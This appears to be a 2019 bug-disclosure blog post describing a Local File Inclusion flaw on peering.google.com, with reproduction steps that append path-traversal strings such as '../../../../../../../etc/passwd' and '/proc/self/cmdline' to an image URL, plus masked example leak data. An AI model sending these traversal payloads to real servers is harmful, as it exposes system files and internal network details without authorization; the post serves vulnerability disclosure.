Ads

الثلاثاء، 21 مايو 2019

Local File Inclusion in peering.google.com


I found an Local File Inclusion 'LFI' Vulnerability in "Google's Edge Network".

Description

As it is known, the impacts of exploiting a Local File Inclusion (LFI) vulnerability vary from information disclosure to complete compromise of the system. Even in cases where the included code is not executed, it can still give an attacker enough valuable information to be able to compromise the system,As is the case of the security vulnerability we are reporting.    
Impact
disclosed Local server information 


Reproduction Steps
  1. Open any picture in another window for example: "https://peering.google.com/static/images/couch-ipad.png".
  2. Add one of this value at the end of the link: ("../../../../../../../etc/passwd") OR ("../../../../../../../proc/self/cmdline") OR ("../../../../../../../proc/self/stat") OR ("../../../../../../../proc/self/status").
  3. .In this way: "https://peering.google.com/static/images/couch-ipad.png../../../../../../../proc/self/cmdline".
  4. Now you are viewing sensitive information about the server.

Example Leak Data:

1.The attacker gets information about the server and Kernel data. PoC: "/proc/version" OR "/proc/cpuinfo" OR "proc/meminfo") Example leak data: "Linux version 3.*.* #1 SMP"

2.The attacker gets information about the files on the server. PoC:"proc/self/cmdline") Example: "server_software=Google App Engine/1.*.*

3.The attacker gets information about the internal network. PoC:"proc/self/cmdline") Example:"apihost_address=169.*.*.253:* /server_address=169.*.*.2:*"

4.The attacker gets information about the operations and the time they run on the server. PoC: "proc/self/stat") Example: "(python27g_runti)"

5.The attacker gets sensitive information about the operation processes and the ability of the system that can contribute well in measuring the size of denial of service attacks. PoC: "proc/self/status"). Example: "FDSize: 11, VmSize: 1134532 kB, VmRSS: 134860 kB, Threads: 17" 

 and More...








ليست هناك تعليقات:

إرسال تعليق